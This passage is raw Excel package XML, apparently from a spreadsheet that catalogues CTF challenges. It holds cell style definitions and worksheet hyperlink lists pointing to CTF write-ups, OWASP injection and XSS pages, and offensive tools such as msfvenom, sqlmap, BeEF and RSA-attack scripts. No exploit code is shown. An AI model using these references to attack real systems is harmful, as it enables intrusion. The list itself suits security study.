    <xf borderId="0" fillId="8" fontId="10" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="0" fontId="58" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="7" fontId="16" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="9" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="9" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="8" fontId="59" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="60" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="0" fontId="18" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="0" fontId="18" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="18" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="18" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="61" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="62" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="20" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="12" fontId="63" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="11" fontId="64" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="8" fontId="20" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="13" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="13" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right"/>
    </xf>
    <xf borderId="0" fillId="13" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="13" fontId="65" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="14" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="14" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right"/>
    </xf>
    <xf borderId="0" fillId="14" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="8" fontId="66" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="14" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="2" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="14" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="2" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right"/>
    </xf>
    <xf borderId="0" fillId="2" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="2" fontId="67" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="14" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="14" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right"/>
    </xf>
    <xf borderId="0" fillId="2" fontId="68" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="14" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="14" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right"/>
    </xf>
    <xf borderId="0" fillId="14" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="14" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="14" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right"/>
    </xf>
    <xf borderId="0" fillId="3" fontId="11" numFmtId="164" xfId="0" applyAlignment="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="3" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="15" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="11" fontId="69"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drawing" Target="../drawings/drawing2.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/google/sanitizers" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.offensive-security.com/metasploit-unleashed/msfvenom/" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://scarybeastsecurity.blogspot.nl/2014/09/using-asan-as-protection.html" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/aweinstock314/aweinstock-ctf-writeups/blob/master/csaw_finals_2015/exploitation500_boombox/boombox_writeup.md" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.clevcode.org/31c3-ctf-maze-write-up/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://fail0verflow.com/blog/2014/31c3ctf-pwn30-pong.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://kitctf.de/writeups/9447ctf2014/europe-writeup/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.germano.io/2014/fuckpyjails-writeup-9447-ctf/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://nedbatchelder.com/blog/201206/eval_really_is_dangerous.html" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://itszn.com/blog/?p=21" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Control_register" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Glossary_of_video_game_terms" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://rafalcieslak.wordpress.com/2013/04/02/dynamic-linker-tricks-using-ld_preload-to-cheat-inject-features-and-investigate-programs/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.lemis.com/grog/Documentation/Lions/book.pdf" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hercules-390.org/" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://googleprojectzero.blogspot.co.il/2014/08/the-poisoned-nul-byte-2014-edition.html" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.josefsipek.net/docs/s390-linux/hercules-s390.html" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://pwntools.com/" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/0vercl0k/rp" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://stackoverflow.com/questions/17630745/why-ulimit-s-unlimited-can-de-aslr-in-overflow" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/VulnHub/ctf-writeups/blob/master/2015/codegate/guesspw.md" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://lokalhost.pl/ctf/defcon2015/fuck.py" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Shellshock_(software_bug)" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/CyberGrandChallenge/cgc-release-documentation" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Simple_Network_Management_Protocol" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ctfs/write-ups-2015/blob/master/9447-ctf-2015/steganography/binned/syscall-stego.py" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://vulph.com/2015/09/27/defcon-hackercalc-writeup.html" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Netpbm_format" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Shellshock_(software_bug)" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kitctf/writeups/blob/master/gits2015/huffy/huffy.py" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://toh.necst.it/hack.lu/2015/exploitable/StackStuff/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/binjitsu/binjitsu/" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hexpresso.wordpress.com/2015/04/06/quals_ndh-2k15-secure-auth-exploit-350-writeup/" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Portable_Network_Graphics" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ctfs/write-ups-2015/tree/master/mma-ctf-2015/pwn/rps-50" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://m.reddit.com/r/netsec/comments/4rba32/perform_effective_command_injection_attacks_like/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/binjitsu/binjitsu/" TargetMode="External"/></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet3.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/drawing" Target="../drawings/drawing3.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Hash-based_message_authentication_code" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://httpd.apache.org/docs/2.2/mod/mod_status.html" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bwall/HashPump" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/evilpacket/DVCS-Pillage" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/SOCKS" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.ascii.cl/htmlcodes.htm" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ctfcrew.org/writeup/95" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Shellshock_%28software_bug%29" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.torproject.org/docs/hidden-services.html.en" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://beefproject.com/" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Ashley_Madison_data_breach" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Time-based_One-time_Password_Algorithm" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.openwall.com/php_mt_seed/" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/80vul/phpcodz/blob/master/research/pch-034.md" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ctfs/write-ups-2014/tree/master/defkthon-ctf/web-300" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://couchdb.readthedocs.io/en/latest/api/database/bulk-api.html" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ONsec-Lab/scripts/blob/master/fastcgipacket.rb" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.freeformatter.com/hmac-generator.html" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cc.gatech.edu/~orso/papers/halfond.orso.manolios.FSE06.pdf" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ucs.fbi.h-da.de/writeup-defcamp2015-rocket-science-admin-panel-web-200/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://sqlmap.org/" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=gweDBQ-9LuQ" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://checkusernames.com/" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/client9/libinjection/blob/master/data/sqli-rsalgado-bhusa2013.txt" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.coffeecup.com/help/articles/absolute-vs-relative-pathslinks/" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://fadec0d3.blogspot.com/2015/09/mma-ctf-2015-login-as-admin-30.html" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://coffeescript.org/" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ctfs/write-ups-2015/tree/master/hack-lu-ctf-2015/web/teachers-pinboard" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.chrome.com/devtools/docs/console" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://lzone.de/cheat-sheet/memcached" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://stackoverflow.com/questions/26614348/perl-open-injection-prevention/26614530" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://memcached.org/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://code.runnable.com/" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://mslc.ctf.su/wp/mma-ctf-2015-motto-mijikai-address-cryptoweb-100300/" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/DOM_Based_XSS" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.php.net/rfc/remove_alternative_php_tags" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://security.stackexchange.com/questions/27906/playing-with-referrer-header" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.sno.phy.queensu.ca/~phil/exiftoo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en.wikipedia.org/wiki/Shor%27s_algorithm" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sourceforge.net/projects/msieve/" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Goldwasser%E2%80%93Micali_cryptosystem" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mimoo/RSA-and-LLL-attacks" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Emirp" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ietf.org/rfc/rfc5246.txt" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.case.edu/artsci/math/singer/Sage/pohligHellman.shtml" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Planet" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://rgpsecurity.wordpress.com/2014/10/17/stasi-vernam-cipher-gernator-tapir/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.geocachingtoolbox.com/index.php?page=asciiConversion" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://quipqiup.com/index.php" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://quipquip.com" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://aes.online-domain-tools.com/" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.adayinthelifeof.nl/2013/12/30/decoding-tls-with-php/" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://quipqiup.com/index.php" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://repeating.xor.cipher.cracker.py" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hashkiller.co.uk/md5-decrypter.aspx" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://tinyurl.com/hwaesbook" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.crimsonagents.com/2015/01/31c3ctf-crypto-sso.html" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/smokeleeteveryday/CTF_WRITEUPS/blob/master/2015/NUITDUHACK/crypto/gameoflife/solution/gameoflifesolution.py" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Conway%27s_Game_of_Life" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Grille_(cryptography)" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ctfs/write-ups-2015/tree/master/whitehat-contest-10/crypto/crypto100" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hashes.org/" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://tasteless.eu/post/2015/04/ndh-2015-quals-weshgrow/" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://quipqiup.com/" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Uniform_Resource_Identifier" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/drawing" Target="../drawings/drawing4.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/pablocelayes/rsa-wiener-attack" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://rumkin.com/tools/cipher/railfence.php" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://web.archive.org/web/20140209124110/http://www.virtualconspiracy.com/download/scrdec18.c" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://symbolhound.com/" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sinfocol/vboxdie-cracker/" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.phrack.org/issues/7/3.html" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://people.scs.carleton.ca/~maheshwa/courses/4109/Seminar11/NTRU_presentation.pdf" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/NTRUEncrypt" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hashkiller.co.uk/md5-decrypter.aspx" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hashkiller.co.uk/md5-decrypter.aspx" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://heinrichs.io/207" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bwall/HashPump" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.factordb.com/index.php?query=79832181757332818552764610761349592984614744432279135328398999801627880283610900361281249973175805069916210179560506497075132524902086881120372213626641879468491936860976686933630869673826972619938321951599146744807653301076026577949579618331502776303983485566046485431039541708467141408260220098592761245010678592347501894176269580510459729633673468068467144199744563731826362102608811033400887813754780282628099443490170016087838606998017490456601315802448567772411623826281747245660954245413781519794295336197555688543537992197142258053220453757666537840276416475602759374950715283890232230741542737319569819793988431443" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Merkle%E2%80%93Damg%C3%A5rd_construction" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5_source.zip , " TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mwielgoszewski/python-paddingoracle" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/everping/ctfs/blob/master/2015/4/plaidctf/crypto/lazy/solve.py" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ius/rsatool" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.iacr.org/cryptodb/archive/2004/CRYPTO/1472/1472.pdf" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://crypto.interactive-maths.com/kasiski-analysis-breaking-the-code.html" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.unix-ag.uni-kl.de/~conrad/krypto/pkcrack.html" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/hellman/xortool" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.sagemath.org/" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 